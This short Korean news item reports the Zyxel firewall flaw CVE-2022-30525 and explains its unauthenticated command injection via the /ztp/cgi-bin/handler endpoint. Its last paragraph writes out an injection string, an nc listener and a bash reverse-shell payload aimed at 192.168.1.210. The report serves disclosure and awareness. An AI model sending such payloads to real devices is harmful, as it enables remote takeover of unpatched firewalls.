인증 없이 코드 실행을 허용하는 Zyxel 방화벽의 취약점

기업의 방화벽, IDS 및 VPN 작동을 구성하도록 설계된 ATP, VPN 및 USG FLEX 시리즈의 Zyxel 장치에서 심각한 취약점(CVE-2022-30525)이 확인되었습니다. 이를 통해 외부 공격자가 컴퓨터에서 코드를 실행할 수 있습니다. 인증 없이 사용자 권한이 없는 장치. 공격을 수행하려면 공격자가 HTTP/HTTPS 프로토콜을 사용하여 장치에 요청을 보낼 수 있어야 합니다. Zyxel은 ZLD 5.30 펌웨어 업데이트의 취약성을 수정했습니다. Shodan 서비스에 따르면 현재 글로벌 네트워크에는 HTTP/HTTPS를 통해 요청을 수락하는 잠재적으로 취약한 장치가 16213개 ​​있습니다.

인증 없이 액세스할 수 있는 웹 핸들러 /ztp/cgi-bin/handler에 특별히 설계된 명령을 전송하여 작업이 수행됩니다. 이 문제는 lib_wan_settings.py 라이브러리에서 사용되고 setWanPortSt 작업을 처리할 때 실행되는 os.system 호출을 사용하여 시스템에서 명령을 실행할 때 요청 매개변수가 제대로 정리되지 않아 발생합니다.

예를 들어, 공격자는 문자열 “; 핑 192.168.1.210;" 그러면 시스템에서 "ping 192.168.1.210" 명령이 실행됩니다. 명령 셸에 액세스하려면 시스템에서 “nc -lvnp 1270”을 실행한 다음 '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

출처 : opennet.ru